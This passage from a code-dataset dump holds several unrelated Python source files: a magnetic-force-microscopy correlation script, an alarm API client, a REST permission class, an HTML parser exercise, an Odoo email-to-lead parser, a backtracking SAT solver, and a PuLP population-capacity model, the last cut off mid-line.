self.btn_Read_path3.grid(row=2,column=0) #self.btn_blur.pack(anchor=tkinter.CENTER, expand=True) \r\n# self.Vfilelist = []\r\n# self.Parameter = []\r\n# self.name = tkinter.StringVar(value='')\r\n# self.File_Labels = []\r\n# self.name = []\r\n# \r\n# self.window.mainloop()\r\n# \r\n# def Read_path1(self):\r\n# self.Path1 = askdirectory()\r\n# self.Vfilelist.append(self.Path1)\r\n# fileselected = []\r\n# self.ii = 0\r\n# self.File_Labels = []\r\n# for self.Vfile in self.Vfilelist:\r\n# fileselected.append(tkinter.Label(self.frame, text=self.Vfile)) #entry.place(x=10, y=10, width=100)\r\n# fileselected[self.ii].grid(row=3+self.ii, column=0)\r\n#\r\n# self.File_Labels.append(tkinter.Entry(self.frame,bd=1))#, textvariable=self.name,width=5)) #entry.place(x=10, y=10, width=100)\r\n# self.File_Labels[self.ii].grid(row=3+self.ii, column=1)\r\n## print(len(self.File_Labels))\r\n# self.ii = self.ii + 1 \r\n# \r\n# def Read_path2(self):\r\n# self.Path2 = askdirectory()\r\n# self.label_Read_path2 = tkinter.Label(self.frame,text=self.Path2)\r\n# self.label_Read_path2.grid(row=3+50+1,column=0)\r\n# \r\n# def Read_paramters(self):\r\n# self.Parameter = []\r\n# self.Parameter = [e.get() for e in self.File_Labels]\r\n# print(self.Parameter)\r\n# \r\n# def result(self):\r\n# return self.Vfilelist#, self.Path2, self.Parameter\r\n# \r\n#folder_locator = App(tkinter.Tk(), \"Tkinter and OpenCV\")\r\n##Save_folder_path = folder_locator.result()[0]\r\n#VertexStat_folder_list = folder_locator.result()[0]\r\n##Parameter = folder_locator.result()[2]\r\n\r\n\r\nVertexStat_folder_list = [\"C:/Users/vmpsk/UW_Research/MyWork/Simulations/InUse_MFM_analysis/testdata/2pin\"] \r\nstat_array = []\r\nfull_stat = []\r\nheader = []\r\nCorr_nn = []\r\nCorr_2nn = []\r\ni=0\r\nfor vertexstat_folder in VertexStat_folder_list:\r\n Xmoment_file = 'Sx_mfm.txt'\r\n Ymoment_file = 'Sy_mfm.txt' #'Sy' + file.split('Sx')[-1]#'Sy_mfm.txt'\r\n\r\n if (os.path.isfile(vertexstat_folder + '/' + Xmoment_file)==True):\r\n ####----Import data from files-------------------------------------------------\r\n mx_moment = MatrixImport(vertexstat_folder+'/'+Xmoment_file)\r\n n0Sx = mx_moment\r\n my_moment = MatrixImport(vertexstat_folder+'/'+Ymoment_file)\r\n n0Sy = my_moment\r\n# Sxy = np.zeros((n0Sx.shape[0],n0Sx.shape[0],2))\r\n# Sxy[:,:,0] = n0Sx\r\n# Sxy[:,:,1] = n0Sy\r\n\r\n 
n0Sx = np.transpose(n0Sx[~(n0Sx==0).all(1)])\r\n n0Sx = np.transpose(n0Sx[~(n0Sx==0).all(1)])\r\n n0Sx = np.delete(n0Sx, (-1), axis=0)\r\n n0Sy = np.transpose(n0Sy[~(n0Sy==0).all(1)])\r\n n0Sy = np.transpose(n0Sy[~(n0Sy==0).all(1)])\r\n n0Sy = np.delete(n0Sy, (-1), axis=1) \r\n Sxy = np.zeros((n0Sx.shape[0],n0Sx.shape[0],2))\r\n Sxy[:,:,0] = n0Sx\r\n Sxy[:,:,1] = n0Sy\r\n #####-----Initialize values---------------------------------------------------- \r\n a = np.array([0,0])\r\n b = np.array([0,0])\r\n #####--------------------------------------------------------------------------\r\n ####--List of x and y values range---------------------------------------------------------\r\n X = frange(0,10,1)\r\n Y = frange(0,10,1)\r\n r = []\r\n list_tuple = []\r\n for x in X:\r\n for y in Y:\r\n a = np.sqrt(x**2 + y**2)\r\n if (a not in r):\r\n r.append(np.sqrt(x**2 + y**2))\r\n r = sorted(r)\r\n t = [x,y]\r\n list_tuple.append(t)\r\n\r\n Cxy = np.zeros((n0Sx.shape[0],n0Sx.shape[0],len(r)))\r\n count = np.zeros((len(r)))\r\n count_i = 0\r\n \r\n for neighbor in list_tuple:\r\n [x,y] = neighbor\r\n print(x,y)\r\n a = np.sqrt(x**2 + y**2)\r\n distance_index = r.index(a)\r\n for i in range(n0Sx.shape[0]):\r\n for j in range(n0Sx.shape[1]):\r\n s = Sxy[i,j,0]\r\n\r\n if a != 0 and s!=0 and i-int(a) >=0 and j-int(a) >=0 and i+int(a) <=n0Sx.shape[0]-2 and j+int(a) <= n0Sx.shape[0]-2 :\r\n count[distance_index] = count[distance_index] + 1\r\n if((x+y)%2 == 0):\r\n if (Sxy[i,j,0] == Sxy[i-y,j-x,0]):\r\n Clt = 1\r\n else:\r\n Clt = -1\r\n\r\n if (Sxy[i,j,0] == Sxy[i+y,j-x,0]):\r\n Clb = 1\r\n else:\r\n Clb = -1\r\n\r\n if (Sxy[i,j,0] == Sxy[i-y,j+x,0]):\r\n Crt = 1\r\n else:\r\n Crt = -1\r\n \r\n if (Sxy[i,j,0] == Sxy[i+y,j+x,0]):\r\n Crb = 1\r\n else:\r\n Crb = -1\r\n\r\n Cijxy = (Clt + Clb + Crb + Crt)/4\r\n\r\n if((x+y)%2 != 0):\r\n if (Sxy[i,j,0] == Sxy[i-y,j-x,0]):\r\n Clt = -1\r\n else:\r\n Clt = 1\r\n\r\n if (Sxy[i,j,0] == Sxy[i+y,j-x,0]):\r\n Clb = -1\r\n else:\r\n Clb = 1\r\n\r\n if (Sxy[i,j,0] == Sxy[i-y,j+x,0]):\r\n Crt = -1\r\n else:\r\n Crt = 1\r\n \r\n if (Sxy[i,j,0] == Sxy[i+y,j+x,0]):\r\n Crb = -1\r\n else:\r\n Crb = 1\r\n \r\n Cijxy = (Clt + Clb + Crb + Crt)/4\r\n####################################################################################################\r\n if s!=0 and i-int(a) >=0 and j-int(a) >=0 and i+int(a) <=n0Sx.shape[0]-2 and j+int(a) <= n0Sx.shape[0]-2 :\r\n\r\n \r\n if((x+y)%2 == 0):\r\n if (Sxy[i,j,0] == Sxy[i-x,j-y,0]):\r\n Clt = 1\r\n else:\r\n Clt = -1\r\n\r\n if (Sxy[i,j,0] == Sxy[i+x,j-y,0]):\r\n Clb = 1\r\n else:\r\n Clb = -1\r\n\r\n if (Sxy[i,j,0] == Sxy[i-x,j+y,0]):\r\n Crt = 1\r\n else:\r\n Crt = -1\r\n \r\n if (Sxy[i,j,0] == Sxy[i+x,j+y,0]):\r\n Crb = 1\r\n else:\r\n Crb = -1\r\n\r\n Cijyx = (Clt + Clb + Crb + Crt)/4\r\n\r\n if((x+y)%2 != 0):\r\n if (Sxy[i,j,0] == Sxy[i-x,j-y,0]):\r\n Clt = -1\r\n else:\r\n Clt = 1\r\n\r\n if (Sxy[i,j,0] == Sxy[i+x,j-y,0]):\r\n Clb = -1\r\n else:\r\n Clb = 1\r\n\r\n if (Sxy[i,j,0] == Sxy[i-x,j+y,0]):\r\n Crt = -1\r\n else:\r\n Crt = 1\r\n \r\n if (Sxy[i,j,0] == Sxy[i+x,j+y,0]):\r\n Crb = -1\r\n else:\r\n Crb = 1\r\n \r\n Cijyx = (Clt + Clb + Crb + Crt)/4\r\n####################################################################################################\r\n Cxy[i,j,distance_index] = (Cijxy+Cijyx)/2\r\n\r\nCorr = np.zeros((len(r))) \r\nfor distance_index in range(np.size(count)):\r\n if count[distance_index] != 0:\r\n Corr [distance_index] = Cxy[:,:,distance_index].sum()/count[distance_index]\r\n \r\nr = np.delete(r, (0), 
axis=0)\r\nCorr = np.delete(Corr, (0), axis=0)\r\n\r\nf = plt.figure(1)\r\nplt.clf()\r\nplt.scatter(r,Corr)\r\nf.show() \r\n#    Cnn = Cxy.sum()/((n0Sx != 0).sum()+(n0Sy != 0).sum()) \r\n#    Corr_nn.append(Cnn)  \r\n\r\n\r\n\r\n### save correlation data ###################\r\n#np.savetxt(Save_folder_path + '/'+'Nearest neighbor correlation.txt', np.transpose(np.vstack([Parameter,Corr_nn])), delimiter='\\t',fmt='%s')\r\n","sub_path":"GUI_Read_AFMCorrelation_V2.py","file_name":"GUI_Read_AFMCorrelation_V2.py","file_ext":"py","file_size_in_byte":11742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"152123161","text":"#!/usr/bin/env python\r\n# Copyright (c) 2013-2014 Wind River Systems, Inc.\r\n#\r\n# The right to copy, distribute, modify, or otherwise make use\r\n# of this software may be licensed only pursuant to the terms\r\n# of an applicable Wind River license agreement.\r\n\r\nfrom cgtsclient.common import base\r\nfrom ceilometerclient.v2 import options\r\n\r\nclass ialarm(base.Resource):\r\n    def __repr__(self):\r\n        return \"<ialarm %s>\" % self._info\r\n\r\n\r\nclass ialarmManager(base.Manager):\r\n    resource_class = ialarm\r\n\r\n    @staticmethod\r\n    def _path(id=None):\r\n        return '/v1/ialarms/%s' % id if id else '/v1/ialarms'\r\n\r\n    def list(self, q=None, limit=None, marker=None, sort_key=None,\r\n             sort_dir=None, include_suppress=False):\r\n        params = []\r\n\r\n        if include_suppress:\r\n            params.append('include_suppress=True')\r\n        if limit:\r\n            params.append('limit=%s' % str(limit))\r\n        if marker:\r\n            params.append('marker=%s' % str(marker))\r\n        if sort_key:\r\n            params.append('sort_key=%s' % str(sort_key))\r\n        if sort_dir:\r\n            params.append('sort_dir=%s' % str(sort_dir))\r\n\r\n        return self._list(options.build_url(self._path(), q, params), 'ialarms')\r\n\r\n    def get(self, iid):\r\n        try:\r\n            return self._list(self._path(iid))[0]\r\n        except IndexError:\r\n            return None\r\n\r\n    def delete(self, iid):\r\n        return self._delete(self._path(iid))\r\n\r\n    def summary(self, include_suppress=False):\r\n        params = []\r\n        if include_suppress:\r\n            params.append('include_suppress=True')\r\n        return self._list(options.build_url(self._path('summary'), None, params))\r\n","sub_path":"wrs-remote-clients-2.0.2/python-wrs-system-client-1.0/build/lib/cgtsclient/v1/ialarm.py","file_name":"ialarm.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"226618054","text":"from rest_framework import permissions\nfrom time import time\nfrom AILab.settings import AUTH_TIME_DELTA as timeDelta\n\n\nclass IsLogin(permissions.BasePermission):\n    message = 'You\\'re not authenticated'\n\n    def has_permission(self, request, view):\n\n        if request.user is None:\n            return False\n        if (request.user.last_activity + timeDelta > time() and request.user.login_status):\n            return True\n\n        return False\n\n    def has_object_permission(self, request, view, obj):\n        return self.has_permission(request, view)","sub_path":"website/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"273454992","text":"# https://www.hackerrank.com/challenges/html-parser-part-1/problem\n\nfrom html.parser import HTMLParser\n\n\nclass MyHTMLParser(HTMLParser):\n\n    def handle_startendtag(self, tag, attrs):\n        print('Empty :', tag)\n        for att in attrs:\n            print('-> {0} > {1}'.format(att[0], att[1]))\n\n    def 
handle_starttag(self, tag, attrs):\n print('Start :', tag)\n for att in attrs:\n print('-> {0} > {1}'.format(att[0], att[1]))\n\n def handle_endtag(self, tag):\n print('End :', tag)\n\n\nparser = MyHTMLParser()\nfor _ in range(int(input())):\n parser.feed(input())\n","sub_path":"13-regex-and-parsing/11-html-parser-1.py","file_name":"11-html-parser-1.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"8961010","text":"# -*- coding: utf-8 -*-\nimport logging\nimport re\nfrom openerp import models, api\nfrom .settings import LANDINGPAGE_EMAIL_PARAM_KEY\n\n\n__author__ = 'Rui Coelho'\n_logger = logging.getLogger(__name__)\n\n_LEAD_ORIGIN_LANDINGPAGE_REF = 'pdf_crm_extensions.product_origin_landingpage'\n_LANDINGPAGE_FROM_ADDRESSES = [u'info@santamartaresidences.com']\n_LANDINGPAGE_INCLUDE_SUBJECT = u'[Landing Page]'\n\n\nclass landingpage_mail_message(models.TransientModel):\n \"\"\"\n Mail message\n \"\"\"\n _name = 'landingpage.mail.message'\n _inherit = ['mail.message', 'automatic.leads.mixin']\n\n @staticmethod\n def _parse_email(email_body):\n \"\"\"\n Parse the email body from contact of a landing page\n :param email_body: email body text\n :return: parsed data\n \"\"\"\n product_reference = re.search(r'Refer\\xeancia:(.*)\\r\\n', email_body).group(0).split(':', 1)[1].strip()\n contact_name = re.search(r'Nome:(.*)\\r\\n', email_body).group(0).split(':', 1)[1].strip()\n contact_email = re.search(r'Email:(.*)\\r\\n', email_body).group(0).split(':', 1)[1].strip()\n contact_phone = re.search(r'Telefone:(.*)\\r\\n', email_body).group(0).split(':', 1)[1].strip()\n comment = re.search(r'Mensagem:(.*)Refer\\xeancia', email_body.replace('\\r\\n', '\\r')).groups()[0].replace('\\r', '\\r\\n').strip()\n \n result = {\n 'product_code': product_reference,\n 'contact_name': contact_name,\n 'contact_email': contact_email,\n 'contact_phone': contact_phone,\n 'name': comment\n }\n\n _logger.info('Extracted data from email: %s', result)\n return result\n\n @api.model\n def mails_to_leads(self):\n \"\"\"\n Load emails received from landing pages and create leads from them\n \"\"\"\n latest_processed_email_id = self.env['ir.config_parameter'].get_param(LANDINGPAGE_EMAIL_PARAM_KEY)\n search_domain = [('type', '=', 'email'), ('id', '>', latest_processed_email_id or 0)]\n search_domain.append(('subject', 'ilike', _LANDINGPAGE_INCLUDE_SUBJECT))\n search_domain += ['|'] * (len(_LANDINGPAGE_FROM_ADDRESSES) - 1) + [('email_from', 'ilike', from_address) for from_address in _LANDINGPAGE_FROM_ADDRESSES]\n\n emails_to_process = self.env['mail.message'].search(search_domain)\n \n origin = self.env.ref(_LEAD_ORIGIN_LANDINGPAGE_REF)\n _logger.info('Processing %i emails from landing pages', len(emails_to_process))\n for email in emails_to_process:\n try:\n parsed_email_data = landingpage_mail_message._parse_email(email.body)\n name = parsed_email_data['contact_name']\n phone = parsed_email_data['contact_phone']\n email_address = parsed_email_data['contact_email']\n self.env['res.partner'].create_or_update(name, phone, email_address, origin.id)\n self._create_lead(parsed_email_data, origin.id)\n except Exception as ex:\n _logger.exception(ex)\n error_context = {}\n error_context['origem'] = 'Email landing page'\n error_context['assunto'] = email.subject\n error_context['email'] = email.body\n self.send_error_notification(error_context)\n\n if len(emails_to_process) > 0:\n 
self.env['ir.config_parameter'].set_param(LANDINGPAGE_EMAIL_PARAM_KEY, max(emails_to_process.ids))\n","sub_path":"pdf_external_leads/models/landingpage_mail_message.py","file_name":"landingpage_mail_message.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"171395975","text":"# backtrack-cde.py : tree evaluates sat\n# Team : CDE: Chris-Donny-Emily\n# Date : 9-26-17\n\n\n# Imports:\nimport sys\nimport os\nimport string\nimport time\nimport random\n\n# Globals:\nVALUE_STACK = []\nFILE_NAME = ''\nBINARY = ''\nINPUT = ''\nWFF = ''\nCOMMENT_LINE = [] # Array - ['c', prob. #, max # literals, (un)solvability]\nPROBLEM_LINE = [] # Array - ['p', file format, # variables, # clauses]\nTOT_LITERALS = 0 # Needed for output\nSTART_TIME = None # Needed for execution time\nEND_TIME = None # \" \" \" \"\nNUM_S = 0\nNUM_U = 0\nNUM_ANSWERS = 0\nNUM_CORRECT = 0\n\n# one command line argument --> name of the file to read wffs from\n# binary argument that turns optional tracing on or off: 1 = yes, 0 = no\n\n\ndef usage(exit_status=0):\n\tprint('''Usage: backtrack-cde.py [FILE_NAME] [BINARY]\n\t\tFILE_NAME\t\t\tThe file to be read that contains wffs.\n\t\tBINARY \t\t\t\t1 = Triggers Optional Tracing ; 0 = Suppress Intermediate Output''')\n\tsys.exit(exit_status)\n\n\n# reads in the next wff from a specified input file\ndef readFile():\n\tf = open(FILE_NAME, 'r')\n\tglobal INPUT\n\tINPUT = f.read()\n\n\n# generates the next possible assignment for the current wff you are working with\n#def nextPossibleAssignment():\n\n\n# takes a wff and an assignment and returns whether or not the assignment satisfied the wff\ndef verify():\n\tvalue_stack = [] # Stack with values for variables ex) [0, 1, 1, 0, 0]\n\twff_stack = [] # Stack with wffs in chronological order, each one gets more reduced\n\ttried_stack = [] # Keeps track of variables for which both values were tried\n\tflag = False\n\tevaluating = True\n\tbacktrack = False\n\n\tWFF_Clauses = WFF.split(',0')\n\tWFF_Clauses.remove('')\n\n\twff_stack.append(WFF_Clauses)\n\n\tglobal TOT_LITERALS\n\tTOT_LITERALS = len(WFF_Clauses) * len(WFF_Clauses[2].split(','))\n\n\twhile evaluating:\n\t\tnum_trues = 0\n\t\tfor var in tried_stack: # Count the number of trues\n\t\t\tif var == True:\n\t\t\t\tnum_trues = num_trues + 1\n\n\t\tnum_trues_row = 0\n\t\tfor rev in reversed(tried_stack): # Count the number of trues in a row from the bottom\n\t\t\tif rev == True:\n\t\t\t\tnum_trues_row = num_trues_row + 1\n\t\t\telse:\n\t\t\t\tbreak\n\n\t\tif num_trues == int(PROBLEM_LINE[2]): # If the number of trues is equal to the number of variables, all variables have tried all possibilities and the wff is unsatisfiable\n\t\t\tevaluating = False\n\t\t\tbreak\n\n\t\tif len(tried_stack) == 0 and len(value_stack) != 0: # If the tried stack has been emptied while values remain, the search space is exhausted and the wff is unsatisfiable\n\t\t\tevaluating = False\n\t\t\tbreak\n\n\t\tnum_clauses = 0\n\t\tfor c in wff_stack[-1]:\n\t\t\tif c != '':\n\t\t\t\tnum_clauses = num_clauses + 1\n\n\t\tif num_clauses == 0: # If the most recent wff is empty, then the wff is satisfiable\n\t\t\tflag = True\n\t\t\tevaluating = False\n\t\t\tbreak\n\t\telif len(value_stack) == int(PROBLEM_LINE[2]): # If we have reached the end of a branch (we have all variables assigned to something) backtrack and reassign that value\n\t\t\ttried_value = value_stack.pop()\n\t\t\twff_stack.pop()\n\t\t\tif 
tried_value == 0: # If the current variable is being reassigned, then it has tried both options and cannot be tried again\n\t\t\t\tvalue_stack.append(1)\n\t\t\t\ttried_stack.pop()\n\t\t\t\ttried_stack.append(True)\n\t\t\telse:\n\t\t\t\tvalue_stack.append(0)\n\t\t\t\ttried_stack.pop()\n\t\t\t\ttried_stack.append(True)\n\t\telif backtrack == True: # Backtrack if any of the clauses in the previous wff were false\n\t\t\ttried_value = value_stack.pop()\n\t\t\twff_stack.pop()\n\t\t\tif tried_value == 0: # If the current variable is being reassigned, then it has tried both options and cannot be tried again\n\t\t\t\tvalue_stack.append(1)\n\t\t\t\ttried_stack.pop()\n\t\t\t\ttried_stack.append(True)\n\t\t\telse:\n\t\t\t\tvalue_stack.append(0)\n\t\t\t\ttried_stack.pop()\n\t\t\t\ttried_stack.append(True)\n\t\telse: # Go down the tree and assign randomly the next variable value\n\t\t\tvalue_stack.append(random.randint(0,1))\n\t\t\ttried_stack.append(False)\n\n\n\t\tif len(tried_stack) > 1 and tried_stack[-1] == True: # If both values were tried for the current variable, backtrack twice and reassign variable from above\n\t\t\tfor i in xrange(0, num_trues_row):\n\t\t\t\tvalue_stack.pop()\n\t\t\t\tif len(wff_stack) != 1:\n\t\t\t\t\twff_stack.pop()\n\t\t\t\ttried_stack.pop()\n\t\t\tif len(tried_stack) == 0:\t\n\t\t\t\tbreak\n\t\t\ttried_stack.pop()\n\t\t\ttried_value = value_stack.pop()\n\t\t\tif tried_value == 0: # If the current variable is being reassigned, then it has tried both options and cannot be tried again\n\t\t\t\tvalue_stack.append(1)\n\t\t\t\ttried_stack.append(True)\n\t\t\telse:\n\t\t\t\tvalue_stack.append(0)\n\t\t\t\ttried_stack.append(True)\n\t\t\n\t\tbacktrack = False\n\t\tClauses_Next = wff_stack[-1][:] # Initialize the next wff as the current wff\n\t\tremove_clauses = [] # List of clauses to be removed from current wff\n\t\tindex_count = 0\n\n\t\tfor clause in Clauses_Next: # Here, we go through the current wff and edit it to create the next wff\n\t\t\tvariables = clause.split(',') # '-1,2,3' --> ['-1', '2', '3']\n\t\t\tremove_variables = []\n\t\t\tvariable_count = 0\n\t\t\tfor variable in variables: # Go through each variable in the clause\n\t\t\t\tall_same = False\n\t\t\t\tif len(variables) > 1:\n\t\t\t\t\tall_same = True\n\t\t\t\t\ttemp = variable\n\t\t\t\t\tfor x in range(0, len(variables)): # Flag for if all variables in clause are the exact same variable\n\t\t\t\t\t\tif variables[x] == temp:\n\t\t\t\t\t\t\ttemp = variables[x]\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tall_same = False\n\t\t\t\t\t\t\tbreak\n\t\t\t\tif variable != '' and abs(int(variable)) == len(value_stack):\n\t\t\t\t\tif int(variable) < 0:\n\t\t\t\t\t\tif value_stack[-1] == 0: # If the variable is 1, this clause returns true and move on to next clause\n\t\t\t\t\t\t\tremove_clauses.append(index_count) # Add this clause to clauses to be removed\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse: # If the variable is 0, it is removed and the rest of the clause moves on down the branch\n\t\t\t\t\t\t\tif not all_same and len(variables) != 1:\n\t\t\t\t\t\t\t\tremove_variables.append(variable_count)\n\t\t\t\t\telse:\n\t\t\t\t\t\tif value_stack[-1] == 1: # If the variable is 1, this clause returns true and move on to next clause\n\t\t\t\t\t\t\tremove_clauses.append(index_count) # Add this clause to clauses to be removed\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse: # If the variable is 0, it is removed and the rest of the clause moves on down the branch\n\t\t\t\t\t\t\tif not all_same and len(variables) != 
1:\n\t\t\t\t\t\t\t\tremove_variables.append(variable_count)\n\t\t\t\tvariable_count = variable_count + 1\n\t\t\t\n\t\t\tfor ind in remove_variables:\n\t\t\t\tvariables[ind] = ''\n\n\t\t\tClauses_Next[index_count] = ','.join(variables)\n\n\t\t\t\t\n\t\t\tif Clauses_Next[index_count] != '' and Clauses_Next[index_count][0] == ',': # Remove leading comma\n\t\t\t\tClauses_Next[index_count] = Clauses_Next[index_count][1:]\n\n\t\t\tif Clauses_Next[index_count] != '' and Clauses_Next[index_count][-1] == ',': # Remove trailing comma\n\t\t\t\tClauses_Next[index_count] = Clauses_Next[index_count][:-1]\n\n\t\t\tcommas = 0\n\t\t\tfor char in Clauses_Next[index_count]:\n\t\t\t\tif char == ',':\n\t\t\t\t\tcommas = commas + 1\n\n\t\t\tif commas == len(Clauses_Next[index_count]): # Remove clauses of just commas\n\t\t\t\tClauses_Next[index_count] = ''\n\t\t\t\n\t\t\tlength = 0\n\t\t\tfor var in variables:\n\t\t\t\tif var != '':\n\t\t\t\t\tlength = length + 1\n\n\t\t\tif length == 1 and variables[0] != '': # If a clause only has one variable and that variable evaluates 0, the entire wff is false so we backtrack\n\t\t\t\tif abs(int(variables[0])) == len(value_stack):\n\t\t\t\t\tif int(variables[0]) < 0:\n\t\t\t\t\t\tif value_stack[-1] == 1:\n\t\t\t\t\t\t\tbacktrack = True\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\telse:\n\t\t\t\t\t\tif value_stack[-1] == 0:\n\t\t\t\t\t\t\tbacktrack = True\n\t\t\t\t\t\t\tbreak\n\t\t\tindex_count = index_count + 1\n\n\t\tfor i in remove_clauses: # where i is the indices of Clauses_Next to be removed\n\t\t\tClauses_Next[i] = ''\n\t\twff_stack.append(Clauses_Next) # Add the newly edited current wff to the stack\n\n\tglobal VALUE_STACK\n\tVALUE_STACK = value_stack\n\treturn flag\n\n\n\n#generates the output line for the wff in the desired format\ndef output(f, verified):\n\tglobal NUM_ANSWERS, NUM_CORRECT, NUM_S, NUM_U\n\tEXECUTION_TIME = (END_TIME - START_TIME)* 10**6\n\t\n\t# Predict SAT.\n\tCOMPARE = '0'\n\tif COMMENT_LINE[3] != '?':\n\t\tNUM_ANSWERS = NUM_ANSWERS + 1\n\t\t# Compare SAT to Answer SAT.\n\t\tCOMPARE = '-1'\n\t\tif SAT == COMMENT_LINE[3]:\n\t\t\tNUM_CORRECT = NUM_CORRECT + 1\n\t\t\tCOMPARE = '1'\n\n\tif verified:\n\t\tNUM_S = NUM_S + 1\n\t\tbit_string = ','.join(str(val) for val in VALUE_STACK)\n\t\t# Prob No., No. Var., No. Clauses, Max Lit., Tot. Lit., S/U, 1/-1, Exec. 
Time, 1/0 (SAT)\n\t\tf.write('{0},{1},{2},{3},{4},{5},{6},{7:.2f},{8}\\n'.format(COMMENT_LINE[1], PROBLEM_LINE[2], PROBLEM_LINE[3], COMMENT_LINE[2], TOT_LITERALS, SAT, COMPARE, EXECUTION_TIME, bit_string))\n\telse:\n\t\tNUM_U = NUM_U + 1\n\t\tf.write('{0},{1},{2},{3},{4},{5},{6},{7:.2f}\\n'.format(COMMENT_LINE[1], PROBLEM_LINE[2], PROBLEM_LINE[3], COMMENT_LINE[2], TOT_LITERALS, SAT, COMPARE, EXECUTION_TIME))\n\n# Times the execution for each wff, from the first call to the assignment generator\n# to the completion of the call to verify, excluding the time to read and parse the\n# wff from the given file and the time to generate the output file.\n# This time should be in microseconds.\n\n# Uses the time package; time.time() gives the current time in seconds.\n\nnum_wffs = 0\n# Parse Command Line:\nif len(sys.argv[1:]) != 2:\n\tusage(1)\nFILE_NAME = sys.argv[1]\nBINARY = sys.argv[2]\n\nOUTPUT_FILE = FILE_NAME.split('/')[1]\nOUTPUT_FILE = OUTPUT_FILE.split('.')[0]\nf = open('backtrack-'+OUTPUT_FILE+'.csv', 'w')\n\nreadFile() # INPUT contains raw file\n\nlines = INPUT.split('\\n')\n\nfor i in range(0, len(lines)):\n\t# Check for 'p' Lines:\n\tif 'p' in lines[i]:\n\t\tstrippedLine = lines[i].strip('\\r')\n\t\tPROBLEM_LINE = strippedLine.split(' ')\n\n\t# Check For 'c' Lines:\n\telif 'c' in lines[i]:\n\t\tWFF = ''\n\t\tBIT_ASSIGNMENT_S = ''\n\t\tCOMMENT_LINE = []\n\t\tPROBLEM_LINE = []\n\n\t\tstrippedLine = lines[i].strip('\\r')\n\t\tCOMMENT_LINE = strippedLine.split(' ')\n\n\t# Add WFF lines to WFF string\n\telse:\n\t\tWFF = WFF + lines[i].strip('\\r')\n\t\t# If the next character is a 'c', evaluate the current WFF\n\t\tif 'c' in lines[i+1]:\n\t\t\tnum_wffs = num_wffs + 1\n\n\t\t\t# Verify the wff\n\t\t\tflag = False\n\t\t\tSAT = 'U'\n\t\t\tSTART_TIME = time.time()\n\t\t\tif verify():\n\t\t\t\tflag = True\n\t\t\t\tSAT = 'S'\n\t\t\tEND_TIME = time.time()\n\t\t\toutput(f, flag)\n\t\tif i+2 == len(lines):\n\t\t\tnum_wffs = num_wffs + 1\n\n\t\t\t# Verify the wff\n\t\t\tflag = False\n\t\t\tSAT = 'U'\n\t\t\tSTART_TIME = time.time()\n\t\t\tif verify():\n\t\t\t\tflag = True\n\t\t\t\tSAT = 'S'\n\t\t\tEND_TIME = time.time()\n\t\t\toutput(f, flag)\n\t\t\ti = len(lines)\n\t\t\tbreak\n\nf.write('{0},cde,{1},{2},{3},{4},{5}'.format(FILE_NAME, num_wffs, NUM_S, NUM_U, NUM_ANSWERS, NUM_CORRECT))\nf.close()","sub_path":"backtrack-cde.py","file_name":"backtrack-cde.py","file_ext":"py","file_size_in_byte":10385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"240123761","text":"import pulp\n\nmy_lp_problem = pulp.LpProblem(\"My LP Problem\", pulp.LpMaximize)\n\n######### -------- VARIABLES -------- ########\n# Number of people; this is what we maximize\nNP = pulp.LpVariable('Numero Personas', lowBound=0, cat='Continuous')\n# Amount of food produced, cal/year\nNc = pulp.LpVariable('Numero Comida', lowBound=0, cat='Continuous')\n# Area used to produce the food, in square meters\nEc = pulp.LpVariable(\"Espacio Comida\", lowBound=0, cat='Continuous')\n# Number of dwellings\nNv = pulp.LpVariable(\"Numero Viviendas\", lowBound=0, cat='Continuous')\n# Total area occupied by the dwellings, in square meters\nETV = pulp.LpVariable(\"ETV\", lowBound=0, cat='Continuous')\n\n######### -------- PARAMETERS -------- ########\n# Arable percentage of the planet's land surface\nPc = 0.37\n# Habitable percentage of Earth's land surface, square meters\nPh = 0.33\n# Non-habitable percentage of Earth's land surface, square meters\nPnh = 0.67\n# Land surface of the planet\nT = 148940000000000\n# Non-habitable area of the Earth, square meters\nEnh = T * Pnh\n# Kilocalories a person needs per day\nX1 = 1500000\n# Area of one dwelling\nEv = 37\n# Food yield per square meter\nRc = 2743\n\nTh = T * 0.71\nTc = Th * 0.38\n\n\n\n######### -------- OBJECTIVE FUNCTION -------- ########\nmy_lp_problem += NP, \"Z\"\n\n\n# the area occupied by dwellings has to equal the area of one dwelling times the number of people\n#my_lp_problem += ETV <= Ev*NP\n\n######### -------- CONSTRAINTS -------- ########\n\n#### ---- GENERAL CONSTRAINTS ---- ####\n#my_lp_problem += T - Enh >= Ec + ETV\n#my_lp_problem += NP*1 != 0 # the number of people has to be nonzero\n\n\n#### ---- HOUSING CONSTRAINTS ---- ####\nmy_lp_problem += NP <= Nv # the number of people has to be at most the number of dwellings (1:1)\nmy_lp_problem += ETV <= Ph*T # the area occupied by dwellings has to be at most the habitable area\nmy_lp_problem += Nv == ETV/Ev # number of dwellings = total dwelling area divided by the area of one dwelling\n\n#### ---- FOOD CONSTRAINTS ---- ####\nmy_lp_problem += NP <= Nc*1/X1 # the number of people has to be at most the food produced divided by what one person eats\n#my_lp_problem += Ec <= Pc*T # Ec has to be at most the arable area\n#my_lp_problem += Ec*1 != 0 # Ec has to be nonzero (if it comes out negative, something went badly wrong)\nmy_lp_problem += Nc == Ec*Rc # food area times the yield of each unit of area = total food produced\nmy_lp_problem += Ec == (547500000*NP)/274300000000 #\nmy_lp_problem += Ec + ETV <= Th # the sum of areas has to be at most the habitable area\nmy_lp_problem += Ec <= Tc # Tc = arable portion of the habitable area (they overlap)\n\n\nprint(my_lp_problem.solve())\nprint(pulp.LpStatus[my_lp_problem.status])\n\nfor variable in 